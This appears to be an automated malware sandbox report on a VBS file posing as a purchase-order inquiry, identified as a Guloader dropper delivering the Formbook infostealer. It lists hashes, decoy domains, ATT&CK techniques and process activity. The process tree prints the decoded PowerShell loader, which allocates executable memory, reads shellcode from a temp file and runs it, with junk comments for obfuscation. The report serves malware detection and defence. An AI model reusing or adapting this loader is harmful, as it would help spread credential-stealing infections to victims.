Analysis

  • max time kernel
    153s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    21-01-2022 14:24

General

  • Target

    New _Inquiry P.O4622.vbs

  • Size

    77KB

  • MD5

    24e935f7534a81a7fd4e32daeab208a5

  • SHA1

    251ac05ebc8c963418dccddda127d2a81b5097db

  • SHA256

    5e6d8684c3f71ca6a76d22d1ddc536f302738a3027d22a5b1ce1852c9c551d99

  • SHA512

    4bd0afc25da140efadb8f49350df7dca32c781a520c85f217d77db6602e51a7731ef955b7d412f5a3edaa0c70cffe47b9b44eda88c3378052d101a1e071f4ede

Malware Config

Extracted

Family

formbook

Version

4.1

Campaign

k6sm

Decoy

mingshengjewelry.com

ontimecleaningenterprise.com

alyssa0.xyz

ptecex.xyz

dukfot.online

pvcpc.com

iowalawtechnology.com

nestletranspotation.com

mysithomes.com

greenlakespaseattle.com

evofishingsystems.com

unilytcs.com

ordemt.com

dentalbatonrouge.com

pictureme360.net

chalinaslacatalana.com

newmirrorimage.xyz

pinklaceandlemonade.com

rapinantes.com

yzicpa.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Formbook Payload 3 IoCs
  • Adds policy Run key to start application 2 TTPs 1 IoCs
  • Checks QEMU agent file 2 TTPs 2 IoCs

    Checks presence of QEMU agent, possibly to detect virtualization.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 29 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\New _Inquiry P.O4622.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1696
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "# L A C T I F E R O   b r e g o   K n o b e t s f r i 9   H e s t 3   G r u e s o m 4   G e n e r a l i s   A F M E J   b e a v e r   B I B L I O G R   D d m a n d s k n 5   n u l l i n   l n p o t s y s t e   T h r e a p e d a f   O u t w r e s   G T E V I V   U n s h a c k l i 8   c o r r e   L A R M E N S F   D i s t i n g v 8   d i s e m b o   H Y P E   U n f i l 9   V A N D B R N D A   G e n n e   B e m e s t r e 4   i n d p a   B i t s y l e   T e r n a s h e   K o k a r d    
  
  
 A d d - T y p e   - T y p e D e f i n i t i o n   @ "  
 u s i n g   S y s t e m ;  
 u s i n g   S y s t e m . R u n t i m e . I n t e r o p S e r v i c e s ;  
 p u b l i c   s t a t i c   c l a s s   b r n e c y k l 1  
 {  
 [ D l l I m p o r t ( " n t d l l . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   N t A l l o c a t e V i r t u a l M e m o r y ( i n t   b r n e c y k l 6 , r e f   I n t 3 2   r e s t b e l b , i n t   D y b b 6 , r e f   I n t 3 2   b r n e c y k l , i n t   a p p l i e , i n t   b r n e c y k l 7 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C r e a t e F i l e A ( s t r i n g   i m m a n , u i n t   H y p o g y n y b , i n t   D i s c i p l 3 , i n t   b r n e c y k l 0 , i n t   P e t u n i e r n , i n t   G r u n g e s m i t , i n t   D e m o r a l 5 ) ;  
 [ D l l I m p o r t ( " k e r n e l 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   i n t   R e a d F i l e ( i n t   D y b b 6 0 , u i n t   D y b b 6 1 , I n t P t r   D y b b 6 2 , r e f   I n t 3 2   D y b b 6 3 , i n t   D y b b 6 4 ) ;  
 [ D l l I m p o r t ( " u s e r 3 2 . d l l " ) ] p u b l i c   s t a t i c   e x t e r n   I n t P t r   C a l l W i n d o w P r o c W ( I n t P t r   D y b b 6 5 , i n t   D y b b 6 6 , i n t   D y b b 6 7 , i n t   D y b b 6 8 , i n t   D y b b 6 9 ) ;  
 }  
 " @  
 # B i s a m s c h u   D o v e n 8   C a l y   K u l d i o x i d   g r a f i k r u t i   L k k e r n   K a n o n i 9   C h e l 9   e n d e b a l l e n   d i s k   T a d e a w o u c 4   U i t o t a n u d 8   C u t l a s s f 4   R h i p 8   T e n d e r e e o   r e i n h o l d   H j e m v i s e l u 9   H U R R S   O m n i 6   B i g g i s 5   O h m a v 4   B u c h   P e g g y p a r a   n v n i n g e d o   F O E L G E S E D    
 T e s t - P a t h   " s o u m "    
 T e s t - P a t h   " E X C L U D "    
 $ b r n e c y k l 3 = 0 ;  
 $ b r n e c y k l 9 = 1 0 4 8 5 7 6 ;  
 $ b r n e c y k l 8 = [ b r n e c y k l 1 ] : : N t A l l o c a t e V i r t u a l M e m o r y ( - 1 , [ r e f ] $ b r n e c y k l 3 , 0 , [ r e f ] $ b r n e c y k l 9 , 1 2 2 8 8 , 6 4 )  
 # S U P E R   S T O C K I L Y R   S t n k e l a 5   e m p r o s t   d e f i n i t t   S e p i a b r u 1   t o p o g r a f e r   D R Y P S T E N   F r e k v 6   D e l i b e 6   M a t i a s 3   h u s n i n g k v   H u s m   C H E E S E F L   v a a g   T h e l   S u p e r 5   s a c r i s t   V e d s t a a   B a g t u n   P r o t y l s 2   S t r y g e k v a 1   I M M O L A T   S t e d   s c r i   f e d e v a r   P e r i o d a    
 T e s t - P a t h   " s n a r e n s "    
 $ b r n e c y k l 2 = " $ e n v : t e m p "   +   " \ b l u e b . d a t "  
 # E t t i n z o m b i 4   i n t e l l e k t   M e n s u r a   f r i h a   S h u t i n g d i e   S K R V S R   S c h i n d y l 1   s y r n i n g e   A D O P T A N T   L u k k e t s b o   b l a n d i n g s f   D E C I M E R E   U d h o l d e l i   S T O C K H O   G e m i   F a b r i k a 2   i n t e r p u n   v a n d s k   s p i l d e   R E G I S T E R   P o s t g i r o k o 3   R i v e r i   O V E R E M   D A N D Y   T r a n s c 3   p o l y   M U S T A N G S   K a s e i n e t   J u g e r i n g t   B E R O L I G E D   S T R A T   A S F A L T   L o g a r i    
 $ b r n e c y k l 4 = [ b r n e c y k l 1 ] : : C r e a t e F i l e A ( $ b r n e c y k l 2 , 2 1 4 7 4 8 3 6 4 8 , 1 , 0 , 3 , 1 2 8 , 0 )  
 # C H R I S T   C E R B   H i g h j   R e k o m m a 8   C O R E C   L Y D I G H E D   A C H O L O E F   m u s l i n g   m a t e r i a l i    
 T e s t - P a t h   " S u a b l "    
 $ b r n e c y k l 5 = 0 ;  
 # S t r a a l   h y p e r   L u n e h y r d   R E I F I K   t e s t a m e   B R I K V V N   I D I O   g r a d u a t   M e a t m a n 5   c o u n t e r e v   P r e i n d e b t e 9   M y o m e r e 3   O p e r a t i v s y   p l i r b e s k a r   s a m a r   L N S A T S   c h e s k   F I G U R T Y P   P o u s s i 4   F U G T F J E   F u n k t i   O m k r s e l s 6   T o a d l   A i r w o r t h   G a s a p p a r a t   B u g s p y t t 6   P r o g r a m s t 5    
 T e s t - P a t h   " b a r a k "    
 [ b r n e c y k l 1 ] : : R e a d F i l e ( $ b r n e c y k l 4 , $ b r n e c y k l 3 , 2 6 1 1 6 , [ r e f ] $ b r n e c y k l 5 , 0 )  
 # S n a d d e n a s o 5   c i r c u   C O N F E C   p r o p o   S u i t a b l e 2   P S E U D O   I N D L G G E L   P u t r e s c e k a 8   X y l o 3   W H U F F   o a s e s k i n   T a m t a m   I m p o r 3   P r o t   T y r o   v e n t r   U N B I D A B   r a a v a r e r n e   H o r a h l u c i a   S y n t h e t   F e d t d   H a a r d 9   V I N K E L   S K A T T E A N S T   M E C H E L   R a n d i a p l   D E T O X I F I   B l n d e n    
 T e s t - P a t h   " T u r f "    
 T e s t - P a t h   " Y V E T "    
 T e s t - P a t h   " O M M A T I D I A "    
 T e s t - P a t h   " T o l u i d o c "    
 T e s t - P a t h   " K U L T U R S A M M "    
 T e s t - P a t h   " k v a l i t e t "    
 T e s t - P a t h   " S a e l g e s s t 3 "    
 T e s t - P a t h   " R a d r e n s "    
 T e s t - P a t h   " T e r n i n g t y "    
 T e s t - P a t h   " f r m n d o v e r "    
 T e s t - P a t h   " A l e v i n "    
 T e s t - P a t h   " D u m p e k a 8 "    
 T e s t - P a t h   " f a s t g r e "    
 T e s t - P a t h   " P a a t a l e r e "    
 [ b r n e c y k l 1 ] : : C a l l W i n d o w P r o c W ( $ b r n e c y k l 3 ,   0 , 0 , 0 , 0 )  
  
 "
        3⤵
        • Checks QEMU agent file
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1504
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pcczncn-.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1068
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES405B.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC404B.tmp"
            5⤵
              PID:1552
          • C:\Program Files (x86)\internet explorer\ieinstal.exe
            "C:\Program Files (x86)\internet explorer\ieinstal.exe"
            4⤵
            • Checks QEMU agent file
            • Suspicious use of NtCreateThreadExHideFromDebugger
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of AdjustPrivilegeToken
            PID:1944
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\SysWOW64\cmd.exe"
        2⤵
        • Adds policy Run key to start application
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • Modifies Internet Explorer settings
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Program Files\Mozilla Firefox\Firefox.exe
          "C:\Program Files\Mozilla Firefox\Firefox.exe"
          3⤵
            PID:1064

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Persistence

      Registry Run Keys / Startup Folder

      2
      T1060

      Defense Evasion

      Modify Registry

      3
      T1112

      Credential Access

      Credentials in Files

      1
      T1081

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      2
      T1082

      Collection

      Data from Local System

      1
      T1005

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\RES405B.tmp
        MD5

        e6d69e0686410d8af9deebeee8a1d8d5

        SHA1

        e9d3501999a64457afaf04164088dfefdc044ed2

        SHA256

        ff1c12f31e4660ec8067378be12aeb18ff26d79faed441341d6e2c5a3febb30a

        SHA512

        4cd618d0269ebe446345910a7aec5f23ea364fbc29c7f8b31fce27e69ff4f0066eadb0a696d5968fd205287c48d6d26973a5a7ca287332c0841fdeba48009ee4

      • C:\Users\Admin\AppData\Local\Temp\blueb.dat
        MD5

        48a7d9c78df69306ae414bea7c1d51de

        SHA1

        02a7398b82bbb72c6f1b5d36ace44951e9cc67e2

        SHA256

        4d8f190a415aed861321d29e69d174effbded24de4841a0f9f534161b1d5b23e

        SHA512

        9ad31cae5c95191d5e46572d554aa57dea11ded2c26f3285ada315feddccd369adc0d2b5254505bd207e8cd9b9fe21287329149fd3c3f6bd535a93223d83993f

      • C:\Users\Admin\AppData\Local\Temp\pcczncn-.dll
        MD5

        3a254767555658f797905b443986dd20

        SHA1

        c535270058435a365950b95b084c04169618171a

        SHA256

        07acba4da7ebadc934e99c227c40ca718c8d83ccad54fbfabf70084b6338a975

        SHA512

        4e3f64761bf32f619b4c353b65433a349fbabe78eed42b875049e250950689e367e265dc5fb641ab0f8e2b11daa3212cd68af4458d4d6a3397e5d9920a1ee987

      • C:\Users\Admin\AppData\Local\Temp\pcczncn-.pdb
        MD5

        eea6e3d689c5ccd0a872c9de332a7a61

        SHA1

        b37c234c8789ae12ae3cdd40c7f72b7c0084bfb5

        SHA256

        844953f8b03e278a12c8ae004b4948e6fd043ea6da743fb3c9ad77d8272f88bd

        SHA512

        5d8e9276366b9d12d97be80913a93f4c194b42f4de7fdf79f830324b1a534b618b04e18287adfef83878cbbc72104ed04a7861d005ad0b5dd5f93a12beeace49

      • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologim.jpeg
        MD5

        55cac8a4c1b5dee70dfcce163495149d

        SHA1

        d3d28a4f6236eb4dccfb0fe05207a19763bcea85

        SHA256

        55347cdaabead9d92748e421b570d9e4793d182c1cc172b811c56795828f44a6

        SHA512

        ebab76ed3fc6a1bb80356452a6fea75b36e4a5a2eb58def38eda4d9835e3bbdd4354c2f862525cfd48ceffa5e0e37ec05c421b47e58d5840992bbdeee0b04fda

      • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrf.ini
        MD5

        2f245469795b865bdd1b956c23d7893d

        SHA1

        6ad80b974d3808f5a20ea1e766c7d2f88b9e5895

        SHA256

        1662d01a2d47b875a34fc7a8cd92e78cb2ba7f34023c7fd2639cbb10b8d94361

        SHA512

        909f189846a5d2db208a5eb2e7cb3042c0f164caf437e2b1b6de608c0a70e4f3510b81b85753dbeec1e211e6a83e6ea8c96aff896e9b6e8ed42014473a54dc4f

      • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologri.ini
        MD5

        d63a82e5d81e02e399090af26db0b9cb

        SHA1

        91d0014c8f54743bba141fd60c9d963f869d76c9

        SHA256

        eaece2eba6310253249603033c744dd5914089b0bb26bde6685ec9813611baae

        SHA512

        38afb05016d8f3c69d246321573997aaac8a51c34e61749a02bf5e8b2b56b94d9544d65801511044e1495906a86dc2100f2e20ff4fcbed09e01904cc780fdbad

      • C:\Users\Admin\AppData\Roaming\7-O4R1-6\7-Ologrv.ini
        MD5

        ba3b6bc807d4f76794c4b81b09bb9ba5

        SHA1

        24cb89501f0212ff3095ecc0aba97dd563718fb1

        SHA256

        6eebf968962745b2e9de2ca969af7c424916d4e3fe3cc0bb9b3d414abfce9507

        SHA512

        ecd07e601fc9e3cfc39addd7bd6f3d7f7ff3253afb40bf536e9eaac5a4c243e5ec40fbfd7b216cb0ea29f2517419601e335e33ba19dea4a46f65e38694d465bf

      • \??\c:\Users\Admin\AppData\Local\Temp\CSC404B.tmp
        MD5

        8c9fab5f66e570889c53ad891f5ad4fa

        SHA1

        84c381aa5ec253337505c5c161af3c03dadbd04d

        SHA256

        fa69d48a9bec1cbb5ea1ad3bbe78b7d4f6085231d416f190c8d74c7f70d1a12c

        SHA512

        c0be70fc83bb60704365a4bbe90cbdc2f40f8e82161c846bee865108f83bbe8d204dd25c13f456f2a459101e12270a00e9ad6bfa6360038775bb7ac83fbea9fa

      • \??\c:\Users\Admin\AppData\Local\Temp\pcczncn-.0.cs
        MD5

        26b2bf42ecc76a6f1d41418840a657a2

        SHA1

        078ef1ce837ad72087c27b59a22376d787047a96

        SHA256

        389198803dcd1407f3597e008cdc8485aca479215d8097646a339b133fcf3ad2

        SHA512

        6c45e6734ef47c372e95eb1b525e0574a056d658c6339b474a5b42e97b2710d6764ddbf70c359b7b59cfe177c4666f10e170c163a258d5ad6c7d50af9b764e43

      • \??\c:\Users\Admin\AppData\Local\Temp\pcczncn-.cmdline
        MD5

        40c24a50758a9a05ffa490e39f843ba3

        SHA1

        77f1fd6475adb5736387e632f83baa4bdc1919e5

        SHA256

        3024f1f1b874b73e13cf092c5a4a60280520037551202626bbf086612627b6e2

        SHA512

        4cf636fca54ab7d348e7947f49a65fccce76615bde775a57e8cee20c8f17b8b0a598991a170a182bddbd0d62ca58a5ad1c70c822d7f5ba269046d789438e0b15

      • memory/1068-63-0x0000000001FE0000-0x0000000001FE1000-memory.dmp
        Filesize

        4KB

      • memory/1248-82-0x0000000006960000-0x0000000006AAD000-memory.dmp
        Filesize

        1.3MB

      • memory/1248-88-0x0000000006AB0000-0x0000000006C02000-memory.dmp
        Filesize

        1.3MB

      • memory/1504-69-0x0000000005AD0000-0x0000000005BD0000-memory.dmp
        Filesize

        1024KB

      • memory/1504-55-0x0000000076001000-0x0000000076003000-memory.dmp
        Filesize

        8KB

      • memory/1504-73-0x0000000077BC0000-0x0000000077D69000-memory.dmp
        Filesize

        1.7MB

      • memory/1504-74-0x0000000077DA0000-0x0000000077F20000-memory.dmp
        Filesize

        1.5MB

      • memory/1504-58-0x00000000023F0000-0x000000000303A000-memory.dmp
        Filesize

        12.3MB

      • memory/1504-59-0x00000000023F0000-0x000000000303A000-memory.dmp
        Filesize

        12.3MB

      • memory/1504-60-0x00000000023F0000-0x000000000303A000-memory.dmp
        Filesize

        12.3MB

      • memory/1696-54-0x000007FEFC441000-0x000007FEFC443000-memory.dmp
        Filesize

        8KB

      • memory/1728-87-0x0000000001E10000-0x0000000001EA4000-memory.dmp
        Filesize

        592KB

      • memory/1728-84-0x0000000000080000-0x00000000000AF000-memory.dmp
        Filesize

        188KB

      • memory/1728-85-0x00000000020E0000-0x00000000023E3000-memory.dmp
        Filesize

        3.0MB

      • memory/1728-83-0x000000004A120000-0x000000004A16C000-memory.dmp
        Filesize

        304KB

      • memory/1944-81-0x000000001BD60000-0x000000001BD75000-memory.dmp
        Filesize

        84KB

      • memory/1944-79-0x0000000000400000-0x000000000069B000-memory.dmp
        Filesize

        2.6MB

      • memory/1944-80-0x0000000000400000-0x000000000042F000-memory.dmp
        Filesize

        188KB

      • memory/1944-78-0x0000000077BC0000-0x0000000077D69000-memory.dmp
        Filesize

        1.7MB

      • memory/1944-72-0x00000000000D0000-0x00000000001D0000-memory.dmp
        Filesize

        1024KB